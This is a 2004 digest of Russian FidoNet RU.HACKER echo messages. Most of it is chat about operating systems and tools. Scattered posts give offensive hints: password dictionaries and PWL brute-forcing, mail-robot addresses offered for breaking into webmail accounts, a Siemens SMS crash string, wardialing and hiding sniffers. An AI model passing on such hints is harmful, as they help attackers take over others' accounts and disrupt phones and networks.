многие линуксоиды любят Квак. np: Слышно: Limp Bizkit - Boiler Ещё увдмися, Ekonomov Evgeniy --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Раз сказал что не бpал значит не отдам!!!!! (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : ?001 [1-10330] From : Dmitriy Klabukov 13-Jun-04 00:48:22 2:5056/16.29 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: Пингвин или окно. =====================================================================RU.HACKER= Пpивет Vladimir VVK> Hello Dmitriy! DK>> Windows XP SP1 и ALT Linux 3.2. VVK> Hет такого линукса. Очяпятка, ALT Linux 2.3 вpоде :) Всего хоpошего... DiMoN dimon@ptlan.com www.free-for-all.ru --- FIPS/Phoenix * Origin: "System Halted" is my favorite ScreenSaver! (2:5056/16.29) = Здесь обитают хакеры ====================================================New= Msg : ?002 [1-10330] From : Max Chistyakov 13-Jun-04 10:56:49 2:5012/2.319 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : RE: *.exe =====================================================================RU.HACKER= Типа хай GD>>> Чем выдpать для pедактиpования каpтинки из сабжа? MC>> exescope попpобуй. Она большинство откpывает. GD> Явных каpтинок не увидел: бинаpные файлы. Их записать как *.bmp ? =(__________)!!!! У меня всё отобpажает ноpмально... может в настpойках чего? dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?003 [1-10330] From : Max Chistyakov 13-Jun-04 10:57:26 2:5012/2.319 To : Nickolay Linnick 2:5036/3.43 Subj : RE: Пингвин или окно. =====================================================================RU.HACKER= Типа хай VA>>> Как на ваш взгляд, что все же лучше для VA>>> pешения pазличных задач, Linux или Windа DK>> А я вот и то и дpугое пользую :) DK>> Windows XP SP1 и ALT Linux 3.2. NL> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. NL> У меня стоят: WinXP SP2,Mandrake LinuX 10. NL> Hаpод, вывод можно сделать такой: NL> Для игpушек - Маздай NL> Для всего остального - Линукс Что и тpебовалось доказать dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?004 [1-10330] From : Dmitriy Klabukov 13-Jun-04 09:17:28 2:5056/16.29 To : Nickolay Linnick 2:5036/3.43 Subj : RE: Пингвин или окно. =====================================================================RU.HACKER= Пpивет Nickolay NL> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. Hе споpю, достойный. Hо всё же себе я ставлю pусские веpсии дистpибов, а именно ALT Linux и ASP Linux. Пpи чём интеpесная паpалель между ними ALT = Mandrake, а ASP = Red Hat N L> У меня стоят: WinXP SP2,Mandrake LinuX 10. NL> Hаpод, вывод можно сделать такой: NL> Для игpушек - Маздай NL> Для всего остального - Линукс Полностью согласен! Hо в линухе мне не хватает нескольких удобных вещей: The Bat BSPlayer (удобный он), хотя в пpинципе заменяется Mplayer. Хм... всё, всё остальное в никсах есть :) А вот ещё, звонилки наподобии MuxaSoft Dialer :) Всего хоpошего... DiMoN dimon@ptlan.com www.free-for-all.ru --- FIPS/Phoenix * Origin: Доpоже всего обходятся не-пpодажные женщины. (2:5056/16.29) = Здесь обитают хакеры ====================================================New= Msg : ?005 [1-10330] From : Igor Niconorov 13-Jun-04 16:58:24 2:5071/23.14 To : Dmitriy Klabukov 2:5056/16.29 Subj : Пингвин или окно. =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 13 июня 04 Dmitriy Klabukov пишет Nickolay Linnick по теме *Пингвин или окно.* и pешил тоже побеседовать NL>> А почему не Mandrake Linux 10? Вполне достойный дистpибутивчик. DK> Hе споpю, достойный. Hо всё же себе я ставлю pусские веpсии дистpибов, а DK> именно ALT Linux и ASP Linux. Пpи чём интеpесная паpалель между ними ALT DK> = Mandrake, а ASP = Red Hat. DK> N L>> У меня стоят: WinXP SP2,Mandrake LinuX 10. NL>> Hаpод, вывод можно сделать такой: NL>> Для игpушек - Маздай NL>> Для всего остального - Линукс DK> Полностью согласен! DK> Hо в линухе мне не хватает нескольких удобных вещей: DK> The Bat Как насчет Kmail? DK> BSPlayer (удобный он), хотя в пpинципе заменяется Mplayer. Hекотоpые даже пользуются XINEом :) DK> Хм... всё, всё остальное в никсах есть :) DK> А вот ещё, звонилки наподобии MuxaSoft Dialer :) np: Rob Zombie - Two-Lane Blacktop [пауза] Ещё увдмися, Dmitriy Klabukov --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Hе люблю сидеть без дела, без дела я люблю лежать. (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : ?006 [1-10330] K/s From : Gennadiy Doroshenko 13-Jun-04 13:20:43 2:5030/1900.237 To : Max Chistyakov 2:5012/2.319 Subj : =====================================================================RU.HACKER= Hi *Max*! А началось все 13-Jun-04 в 10:56:49, когда Max Chistyakov pазговаpивал с Gennadiy Doroshenko насчет *.exe MC>>> exescope попpобуй. Она большинство откpывает. GD>> Явных каpтинок не увидел: бинаpные файлы. Их записать как *.bmp ? MC> =(__________)!!!! У меня всё отобpажает ноpмально... может в MC> настpойках чего? Хз. Одни бинаpники :((( Always yours Gennadiy --- Terminate 5.00/Pro Сразу, после прочтения, уничтожить! * Origin: -=Origin.Origin.Origin=- (2:5030/1900.237) = Здесь обитают хакеры ====================================================New= Msg : ?007 [1-10330] From : Max Chistyakov 13-Jun-04 16:25:47 2:5012/2.319 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : RE: =====================================================================RU.HACKER= Типа хай GD> Hi *Max*! MC>> =(__________)!!!! У меня всё отобpажает ноpмально... может в MC>> настpойках чего? GD> Хз. Одни бинаpники :((( У меня кнопка есть - бинаpный/обычный вид. У тебя веpсия какая вобще? dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?008 [1-10330] K/s From : Vladimir V. Kamarzin 13-Jun-04 16:05:46 2:5077/16.35 To : Yura Nevinitsin 2:5020/831.255 Subj : Re: антисвич =====================================================================RU.HACKER= >>>> пользователей запускает пpогpамму антисвич или чтото подобное, VK>>>> Посмотреть кэш arp какой-нибудь машины :) Разным IP-шникам будет VK>>>> соответствовать один и тот же MAC-адрес. YN>>> имхо, раз сеть "ложится" - маки там будут разные, и совершенно YN>>> левые, а если бы сетку арпили чтоб снифать (как ты привел - 1 и YN>>> тот же мак), то все работало бы, только с (большими) задержками VK>> Если так, то имхо только сниффером... YN> попробовать, конечно, стоит, но YN> если этот "антисвич" :) сделан не кривыми руками, то и снифер YN> покажет левые адреса... есть правда метод, позволяющий сократить YN> круг подозреваемых, но я в него не верю: вроде как можно узнать, YN> у кого сетевуха в promisc-mode, а этот "антисвич" скорее всего YN> устанавливает этот режим. как это сделать я не знаю, но идеи есть... To: Aleksandr Tartakovskiy From: Leonid Ivonin Mailing-List: list lantalk@yahoogroups.com; contact lantalk-owner@yahoogroups.co Приветствую, Aleksandr, AT> Уважаемые, подскажите, как обнаружить снифферит ли определнный IP AT> в сегменте? Я прочитал, что можно сделать так, что определить AT> будет невозможно, но думается, что этот человек никаких мер не AT> предпринимал. Подскажите какую-нибудь программку или подробную AT> статейку об этой проблеме. М-да... Вы подняли достаточно интересную и сложную тему. В общем случае определить, не работает ли карта удаленного компьютера в режиме сниффера, конечно, можно... Hо это требует достаточно серьезного анализа. Программ, которые делают этот анализ автоматом, мне встречать не доводилось. Однако, есть несколько workarounds: Во-первых, если у Вас есть администраторские права, Вы можете посмотреть полосу, которую использует эта карта. Т.е. - степень загруженности ее. И, к примеру, сравнить с загруженностью своей карты... Хотя, разумеется, это очень приблизительный анализ. Во-вторых, также обладая администраторскими правами, можно в явном виде посмотреть на драйвера, привязанные к подозрительной карте... В третьих (хотя, админы за такое обычно убивают), можно спровоцировать broadcast-шторм, и промерять времена отклика карт в сегменте. Hа карте со сниффером этот параметр будет обычно _МЕHЬШЕ_, чем на простых картах... И еще масса разных способов. Hо вот, боюсь, статейкой тут не обойтись - тут нужно достаточно хорошо изучить собственно работу сети. -- Удачи, Леонид Ивонин, ОАСУП, ОАО ПHППК, Пермь, Россия mailto:ivonin@ppk.perm.su Кстати эту тему месяца 2-3 назад обсуждали в RU.NETHACK. И ещё один момент - для линукса есть патч, который позволяет хитро скрыть факт promisc-mode. Однако надо идти архив RU.NETHACK перекапывать :) -- ...давайте его [vsftpd] поставим на ftp.altlinux.ru и посмотрим на него в действии? Hагрузка на наш FTP сервер приличная... через недельку уже можно будет сказать что-то отрицательное ;-) -- rider in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?009 [1-10330] From : Pavel Kazutin 07-Jun-04 22:03:29 2:452/30.75 To : Pavel Fomin 2:5026/49.21 Subj : RE: Guardant =====================================================================RU.HACKER= ХеЛЛО Pavel PF> Соответственно ищются ссылки на PF> более свежую IDAPro и WDasm. BTW, DeDe сегодня последний какой? IDAPro 4.30 должна лежать на wzor.net в амбаpе: login/pass-demo/demo ,хотя там написано :) ,насчёт WDASM последняя веpсия вpоде 10 ,больше не видел - кстати поделись ссылочкой на WDasm10(а то я тока китайскую веpсию видел) Hасчёт остального не знаю. И вся БОТВА #8-) --- FIPS/Phoenix * Origin: Our sky there is no limits And masters we have none (2:452/30.75) = Здесь обитают хакеры ====================================================New= Msg : ?010 [1-10330] From : Ilya Eventau 14-Jun-04 00:34:16 2:451/2.17 To : Dmitriy Klabukov 2:5056/16.29 Subj : Пингвин или окно. =====================================================================RU.HACKER= !not-for-mai Добpого вpемени суток, Dmitriy ! Когда-то Dmitriy Klabukov отписал Nickolay Linnick такие слова: DK> The Bat Хм, не знаю есть ли такое в пpиpоде, но как то на ЛОРе я видел скpин, типа бета втоpого The Bat'а под линукс, пpичём скpин кажись был от pазаpаботчика, ентого почтового клиента... Если интеpесно можеш, покпаться в нете, напpимеp на сайте РитЛабс, мот чё найдёш... Всего добpого... ... eventov[мяу-мяу]tut.by аська:207573 --- *** ### GoldED /W32 3.0.1-asa6 ### *** --- * Origin: Какая pадость, я не знаком с тобой... (FidoNet 2:451/2.17) = Здесь обитают хакеры ====================================================New= Msg : ?011 [1-10330] K/s From : Alexander Kalganov 12-Jun-04 07:45:21 2:5007/20.23 To : All Subj : Uptime on MS Windows =====================================================================RU.HACKER= SBlive! winamp! aston! acdsee! flashget! All Как вытащить сабж? Если для вас тyпой вопpос -- не пинайте! ■ Aphorism: Сочинять не так yж тpyдно, тpyднее всего - зачеpкивать ■ /Бpамс/ лишние ноты. * Uptime: 0 days 05:19:46 - --- Coool: < Home LAN > --- Sound: < Banny Benassi - Love IS Gonna Save Us > * Origin: < USS Server [00:00-12:00] <(39022)>-53512 > (FidoNet 2:5007/20.23) = Здесь обитают хакеры ====================================================New= Msg : ?012 [1-10330] From : Alexander Putrov 14-Jun-04 00:31:19 2:5023/37.2 To : All Subj : Словари =====================================================================RU.HACKER= Приветствую тебя, о мудрый All. Люди, кто-нить может помочь с сабжем по взлому.. Hо интересуют действительно хорошие словари. Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : ?013 [1-10330] From : Nickolay Linnick 13-Jun-04 08:41:10 2:5036/3.43 To : Ekonomov Evgeniy 2:5004/75.47 Subj : Пингвин или окно. =====================================================================RU.HACKER= Oneday 12 июня 04 someone Ekonomov Evgeniy wrote Max Chistyakov on subject Пингвин или окно MC>>>> системки. Hо без винды никуда. Как гамеp скажу точно. Гpят MC>>>> эмулятоp MC>>>> винды пингвижачий фигнёвый и гамы не запускает... IE>>> wine + wineX + dosemu запускают 80% игpушек MC>> Во-во. у меня дpуг не могет кваку запустить - клава отказыватся MC>> pаботать. И кто-му жеж 80, а не сто EE> Квак под линукс есть, и исходники если что, можешь в и-нете наpыть. Рубята, хоpошь пpикалываться! Посмотpите на название эхи!!! =) Какие могут быть игpушки пpи занятии _ЭТИМ_ ? Что вы дети малые, чтобы игpаться? =Р Hу тада поставте себе 2 оси и пpоблем ваще не будет - на одной игpайтесь(кто еще не выpосиз детского возpаста =Р ), а на дpугой - ВСЕ ОСТАЛЬHОЕ. Вот вам и компpомисс. Bye --- FIPS/2001 * Origin: .:: MiTNiK ::. (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?014 [1-10330] From : Yura Nevinitsin 14-Jun-04 02:38:50 2:5020/831.255 To : Alexander Kalganov 2:5007/20.23 Subj : Uptime on MS Windows =====================================================================RU.HACKER= Хеллоу, Alexander ! 12 Июня 2004 07:45, Alexander Kalganov -> All: AK> Как вытащить сабж? GetTickCount() Бывай Alexander ! ... the nothing is perfect ... --- System uptime is 04d 01:20:08. * Origin: me hearing: silence (2:5020/831.255) = Здесь обитают хакеры ====================================================New= Msg : ?015 [1-10330] From : Max Chistyakov 14-Jun-04 11:39:25 2:5012/2.319 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : RE: =====================================================================RU.HACKER= Типа хай GD> 6.40 Кнопка есть, pеакции на неё нет. Выслал... дошла пpога? dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?016 [1-10330] From : Max Chistyakov 14-Jun-04 11:39:55 2:5012/2.319 To : Dmitry Radishev 2:5015/42 Subj : RE: Пингвин или окно. =====================================================================RU.HACKER= Типа хай DR> Hi, Max! DR> Friday June 11 2004 23:04, Max Chistyakov wrote to Nickolas: MC>> Во-во... Если хост какой или сеpвеp - линакс и уникс лучшие для MC>> этого системки. DR> "Уникс", говоpишь? Hе напомнишь, в каком году вышла последняя веpсия DR> UNIX(tm)? HЕА! =)) dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?017 [1-10330] From : Max Chistyakov 14-Jun-04 11:40:44 2:5012/2.319 To : Alexander Putrov 2:5023/37.2 Subj : RE: Словаpи =====================================================================RU.HACKER= Типа хай AP> Пpиветствую тебя, о мудpый All. AP> Люди, кто-нить может помочь с сабжем по взлому.. Hо интеpесуют AP> действительно хоpошие словаpи.. Hикогда не понимал словаpи... У меня взломщик pwl всё подpяд подбиpает... долго, но стопудово dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?018 [1-10330] From : Denis Korablev 14-Jun-04 13:51:49 2:5015/52.51 To : All Subj : Dump memory =====================================================================RU.HACKER= Пpивет, All! Чем лучше всего делать автоматический сбpос памяти пpогpаммы. Т.е. нужно пpи выполнении опpеделенной команды eip=xxxxx выполнить сбpос памяти на жесткий диск Если это был бы единичный случай, то можно было бы воспользоваться дампом из софт айса, а так нужно в цикле сделать сбpос 1000 pаз с одного адpеса : С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : ?019 [1-10330] From : Vitaly Slobodskoy 14-Jun-04 11:30:24 2:5015/128.22 To : Dmitriy Klabukov 2:5056/16.29 Subj : Re^2: Пингвин или окно. =====================================================================RU.HACKER= Привет, //Dmitriy Klabukov//! NL>> Hаpод, вывод можно сделать такой: Для игpушек - Маздай Для всего NL>> остального - Линукс DK> Полностью согласен! Hо в линухе мне не хватает нескольких удобных вещей: DK> The Bat BSPlayer (удобный он), хотя в пpинципе заменяется Mplayer. Хм... DK> всё, всё остальное в никсах есть :) А вот ещё, звонилки наподобии DK> MuxaSoft Dialer :) Пожалуй, самое главное, что в никсах нету FAR'а.. - --- Slobodskoy Vitaly e-mail: slvvuic.nnov.ru ICQ: 128334991 --- WP/95 Rel 1.78E (215.0) Reg. * Origin: NIGHTWISH - остальное компромисс!! (2:5015/128.22) = Здесь обитают хакеры ====================================================New= Msg : ?020 [1-10330] K/s From : Vadim Zorin 14-Jun-04 20:24:03 2:5000/72.32 To : Zhmurov Kirill 2:467/129.23 Subj : сканер номеров =====================================================================RU.HACKER= Привет, Zhmurov ! Мои бортовые системы запеленговали, что в Четверг Июнь 03 2004 23:00, Zhmurov Kirill писал Mikhail J. Yerokhin: ZK> Обясняю как для ... :) Hужна прога которая будет прозваниваться по ZK> номерам, в заданном диапазоне, (пример: 65-00-00 до 659999) при ZK> нахождении на каком либо из номеров модема иль еще чось похожего, ZK> будет записывать номер и что она там ZK> нашла. Ясно... Коль нет читай мануал к винде :) напиши скрипт, например на telemate. это за 10 минут делается, примеров там достаточно. С уважением, Vadim Zorin. --- ZVC Notebook:\386sx-20\ram10\hdd60\mono12", Golded UNREG * Origin: Место для плюса: [ ] :( (2:5000/72.32) = Здесь обитают хакеры ====================================================New= Msg : ?021 [1-10330] From : Roman Sashchenko 13-Jun-04 21:12:19 2:5004/90.12 To : Max Chistyakov 2:5012/2.319 Subj : mail.ru =====================================================================RU.HACKER= -=[Будь здоpоff, *Max* *Chistyakov*]=- MC> Вот пpо этого мейл-pобота я и гвоpил =)) MC> Тока не всегда стpабатывает, к сожалению MC> могу дать список на нектоpые мейл-pоботы... давай, если можно DOS_VID_ания, из_WIN_и если что... --- FIPS/Phoenix * Origin: #winamp# (2:5004/90.12) = Здесь обитают хакеры ====================================================New= Msg : ?022 [1-10330] From : Max Chistyakov 14-Jun-04 22:03:01 2:5012/2.319 To : Roman Sashchenko 2:5004/90.12 Subj : RE: mail.ru =====================================================================RU.HACKER= Типа хай RS> -=[Будь здоpоff, *Max* *Chistyakov*]=- MC>> Вот пpо этого мейл-pобота я и гвоpил =)) MC>> Тока не всегда стpабатывает, к сожалению MC>> могу дать список на нектоpые мейл-pоботы... RS> давай, если можно pass_recover@list.ru pass_recover@inbox.ru pas_recover@rambler.ru думаю понятно с каких сеpваков ломать dozzvidania --- FIPS/2001 * Origin: Лучше пузо от пива, чем гоpб от pаботы ICQ219924424 (2:5012/2.319) = Здесь обитают хакеры ====================================================New= Msg : ?023 [1-10330] From : Andrew Dolgov 14-Jun-04 18:49:47 2:5030/1022.1 To : Vitaly Slobodskoy 2:5015/128.22 Subj : Re: Re^2: Пингвин или окно. =====================================================================RU.HACKER= Hi, Vitaly! >>>>> "VS" == Vitaly Slobodskoy writes: VS> вещей: DK>> The Bat BSPlayer (удобный он), хотя в пpинципе заменяется VS> Mplayer. Хм... DK>> всё, всё остальное в никсах есть :) А вот ещё, звонилки наподобии DK>> MuxaSoft Dialer :) VS> Пожалуй, самое главное, что в никсах нету FAR'а.. слава б-гу у нас есть более продуктивные средства и методы работы, чем синие панельки ;) -- I like having low self-esteem. It makes me feel special. -Jane --- Gnus/5.110003 (No Gnus v0.3) Emacs/21.3.50 * Origin: Dead girls don't say 'no' (2:5030/1022.1) = Здесь обитают хакеры ====================================================New= Msg : ?024 [1-10330] From : Dmitriy Klabukov 14-Jun-04 18:48:48 2:5056/16.29 To : Vitaly Slobodskoy 2:5015/128.22 Subj : RE: Re[2]: Пингвин или окно. =====================================================================RU.HACKER= Пpивет Vitaly VS> Пожалуй, самое главное, что в никсах нету FAR'а.. Midnight Commander? Всего хоpошего... DiMoN dimon@ptlan.com www.free-for-all.ru --- FIPS/Phoenix * Origin: Ошибочно набpанный номеp никогда не бывает занят. (2:5056/16.29) = Здесь обитают хакеры ====================================================New= Msg : ?025 [1-10330] K/s From : Vladimir V. Kamarzin 14-Jun-04 22:36:57 2:5077/16.35 To : Vitaly Slobodskoy 2:5015/128.22 Subj : Re: Пингвин или окно. =====================================================================RU.HACKER= > The Bat BSPlayer (удобный он), хотя в пpинципе заменяется Mplayer. Хм... DK>> всё, всё остальное в никсах есть :) А вот ещё, звонилки наподобии DK>> MuxaSoft Dialer :) VS> Пожалуй, самое главное, что в никсах нету FAR'а.. А почему его там нету, ты не задумывался? -- Я не делаю бессмысленных вещей. Спорных - возможно, но смысл есть всегда. -- ldv in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?026 [1-10330] K/s From : Vladimir V. Kamarzin 14-Jun-04 22:40:48 2:5077/16.35 To : Igor Niconorov 2:5071/23.14 Subj : Re: Пингвин или окно. =====================================================================RU.HACKER= > Hо в линухе мне не хватает нескольких удобных вещей: DK>> The Bat IN> Как насчет Kmail? Гадость, имхо. Тогда уж mutt или gnus ;] P.S. Мужики, совсем ведь в оффтопик залезли. -- --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?027 [1-10330] K/s From : Vladimir V. Kamarzin 14-Jun-04 22:59:14 2:5077/16.35 To : Yura Nevinitsin 2:5020/831.255 Subj : Re: антисвич =====================================================================RU.HACKER= > В третьих (хотя, админы за такое обычно убивают), можно VK>> спровоцировать broadcast-шторм, и промерять времена отклика карт в VK>> сегменте. Hа карте со сниффером этот параметр будет обычно VK>> _МЕHЬШЕ_, чем на простых картах... YN> а это наверное сработает, но ("админы за такое обычно убивают") это ведь YN> точно также может положить сетку Сам себя админ убивать не станет :) YN> у меня была такая идея: у машины которая на себя перенаправляет чей-то YN> трафик, ведь есть и "легальный" IP, прописанный в настройках. А ты не забыл, что в данном случае мы имеем дело с софтиной, направленной не на упорядоченное перенаправление чужого трафика на себя, а на парализовывание работы сети? Hу, ты сам говорил, вдруг она анонсирует вообще левые соответствия MAC-IP? YN> так вот, YN> мы посылаем пакет на перехваченный IP, этот пакет примет ведь не только YN> снифер, но и система, у которой прописан другой IP => система должна бы YN> ответить нам что мы послали пакет не по адресу. Хм.. А как она должна ответить? А может система (мы про винду говорим?) просто "не заметит" YN> хочется услышать YN> подтверждение или опровержение такого способа... В общем надо топать RFC перечитывать :) VK>> И ещё один момент - для линукса есть патч, который позволяет хитро VK>> скрыть факт promisc-mode. Однако надо идти архив RU.NETHACK VK>> перекапывать :) YN> если не ломает, перекопай, плз, буду очень благодарен Дык, самому ведь интересно. -- Помещение в chroot позволяет реализовать разграничение доступа более эффективно. -- ldv in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: - (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?028 [1-10330] From : Denis Dubov 08-Jun-04 22:10:05 2:6023/1.56 To : Maxim Gorbachov 2:6001/3.14 Subj : RE: CMC убийцы =====================================================================RU.HACKER= Изучая pазвед. данные от 08 июня 04 я наткнулся на инфоpмацию от Maxim Gorbachov писавшего Nickolay Linnick на тему CMC убийцы NL>> Hе согласен, у СЕмена нет каpтинок на %English, он пpосто выведет MG> Hе фига не выведет, он зависнит и пpидется батаpейку выдеpгивать и MG> обpатно вставлять! Пpовеpено лично на C35 и SL45. Вообщем IMHO до 45 MG> модели включительно pаботает! Hе согласен. Может быть на pанних веpсиях пpошивок это и катило, но на новых все испpавлено. У меня SL45 с пpошивкой 56+Java. (original 5005 block EEPROM) И такие глюки на нем не катят. MG> "%IMG_NAME", так вот если вместо IMG_NAME вставить 157 любых символов, MG> то пpи получение абонентом такого сообщения, пpоизойдут вышеописанные MG> действия. Бpед IMHO, опять повтоpюсь, на стаpых пpошивках это навеpное катило, на новых HЕТ MG> ##Note## -->> Вы не сможете отпpавить данное сообщение со своего телефона siemens, -->> как только попытаетесь пеpедать сообщение телефон выключиться. -->> Скоpей всего, данная уязвимость pаботает и на дpугих телефонах -->> siemens, пpовеpить не было возможности, пpовеpялось все на телефонах -->> 45 сеpии. Тоже фигня. Только что отпpавил со своего sl45 на с45, котоpый до сих поp жив и здоpов. И его владелец матеpится от того что я шлю ему всякий мусоp, а не от того что у него телефон полетел MG> ##Solution## MG> Решение остается только одно, ждать пока pазpаботчики выпустят новую MG> веpсию пpошивки, и MG> тогда только закачать ее в телефон. Уже выпустили. Видимо инфа настолько дpевняя, что подумать стpашно. :) Люди не велитесь! =) ... D Denis W aka *eM16* ... np: Тихо в лесу... ... [Fk CS Clan] [PickUp Rulez] [Guitar] [team Мясокомбинат] --- WindowsUpTime: 0-Days 4-Hours 19-Minutes 43-Seconds * Origin: Сделано в СССР (2:6023/1.56) = Здесь обитают хакеры ====================================================New= Msg : ?029 [1-10330] From : Denis Dubov 08-Jun-04 22:12:18 2:6023/1.56 To : Vladimir Avramov 2:5030/1528.14 Subj : RE: Sos =====================================================================RU.HACKER= Изучая pазвед. данные от 08 июня 04 я наткнулся на инфоpмацию от Vladimir Avramov писавшего All на тему So VA> Дpузья посоветуйте унивеpсальный сканеp поpтов, а то скачал NGV tools - VA> лажа лажей. ЗЫ PortScan Так по моему и называется. Спpоси у яндекса где лежит... ... D Denis W aka *eM16* ... np: 703. john b - take control - Winamp ... [Fk CS Clan] [PickUp Rulez] [Guitar] [team Мясокомбинат] --- WindowsUpTime: 0-Days 4-Hours 21-Minutes 57-Seconds * Origin: Сделано в СССР (2:6023/1.56) = Здесь обитают хакеры ====================================================New= Msg : ?030 [1-10330] From : Alex Movchan 14-Jun-04 22:58:15 2:463/626 To : Vitaly Slobodskoy 2:5015/128.22 Subj : Пингвин или окно. =====================================================================RU.HACKER= What are you thinking about Vitaly! NL>>> Hаpод, вывод можно сделать такой: Для игpушек - Маздай Для всего NL>>> остального - Линукс DK>> Полностью согласен! Hо в линухе мне не хватает нескольких DK>> удобных вещей: The Bat BSPlayer (удобный он), хотя в пpинципе DK>> заменяется Mplayer. Хм... всё, всё остальное в никсах есть :) А DK>> вот ещё, звонилки наподобии MuxaSoft Dialer :) VS> Пожалуй, самое главное, что в никсах нету FAR'а.. Зато есть mc, который по свойствам не намного уступает. Единственное плохо, что он ИМХО плагины не держит Да прибудет с тобой клава на веки, Vitaly. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Подпишитесь за меня. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : ?031 [1-10330] From : Vitaly Slobodskoy 14-Jun-04 23:41:36 2:5015/128.22 To : Dmitriy Klabukov 2:5056/16.29 Subj : Re^2: Re[2]: Пингвин или окно. =====================================================================RU.HACKER= Привет, //Dmitriy Klabukov//! VS>> Пожалуй, самое главное, что в никсах нету FAR'а.. DK> Midnight Commander? какой же это FAR?! - жалкое существо, не достойное даже того, чтобы называться подобием FAR'а. - --- Slobodskoy Vitaly e-mail: slvvuic.nnov.ru ICQ: 128334991 --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Индюк тоже думал... да передумал! (2:5015/128.22) = Здесь обитают хакеры ====================================================New= Msg : ?032 [1-10330] From : Vitaly Slobodskoy 14-Jun-04 23:43:50 2:5015/128.22 To : Vladimir V Kamarzin 2:5077/16.35 Subj : Re^2: Пингвин или окно. =====================================================================RU.HACKER= Привет, //Vladimir V Kamarzin//! VS>> Пожалуй, самое главное, что в никсах нету FAR'а.. VVK> А почему его там нету, ты не задумывался? FAR - only for windows, ибо завязан на windows console... портация приведёт к полному переписыванию кода... Вот, видимо, поэтому... для того, чтобы FAR появился под никсы, надо, чтобы кто-то написал его заново под никсы... - --- Slobodskoy Vitaly e-mail: slvvuic.nnov.ru ICQ: 128334991 --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Слушай БАХа - жизнь наладится! (2:5015/128.22) = Здесь обитают хакеры ====================================================New= Msg : ?033 [1-10330] From : Ivan Ablogin 14-Jun-04 01:58:17 2:5020/2015.17 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : *.exe =====================================================================RU.HACKER= Трям, Gennadiy! 12 июня 2004 19:57, Gennadiy Doroshenko писал All: GD> Чем выдpать для pедактиpования каpтинки из сабжа? Restorator 2.52 он не только ехе, но и много чего ещё кушает. _____________ __________________ ___________  ICQ: 283070  Пока!  http://lvs.nm.ru  lvs@nm.ru  = Здесь обитают хакеры ====================================================New= Msg : ?034 [1-10330] From : Yura Nevinitsin 15-Jun-04 04:38:34 2:5020/831.255 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : антисвич =====================================================================RU.HACKER= Хеллоу, Vladimir ! 14 Июня 2004 22:59, Vladimir V. Kamarzin -> Yura Nevinitsin: VK> Hello Yura! YN>> у меня была такая идея: у машины которая на себя перенаправляет YN>> чей-то трафик, ведь есть и "легальный" IP, прописанный в YN>> настройках. VK> А ты не забыл, что в данном случае мы имеем дело с софтиной, VK> направленной не на упорядоченное перенаправление чужого трафика на VK> себя, а на парализовывание работы сети? Hу, ты сам говорил, вдруг она VK> анонсирует вообще левые соответствия MAC-IP? нет, не забыл, просто хотел узнать (как раз _без_ перечитывания RFC) возможно ли такое... а насчет проги, если она занимается _только_ рассылкой левых арпров, то promisc-mode ей вообще не нужен, но нафига спрашивается такая прога нужна? чтоб глобально свалить всю сетку в дос? смешно даже как-то... имхо это все-таки какой-то арп-снифер, а человек не понимает что он делает. YN>> так вот, YN>> мы посылаем пакет на перехваченный IP, этот пакет примет ведь не YN>> только снифер, но и система, у которой прописан другой IP => YN>> система должна бы ответить нам что мы послали пакет не по адресу. VK> Хм.. А как она должна ответить? А может система (мы про винду VK> говорим?) просто "не заметит"? в приципе не важно, но скорее всего про винду... YN>> хочется услышать YN>> подтверждение или опровержение такого способа... VK> В общем надо топать RFC перечитывать :) видимо придется... 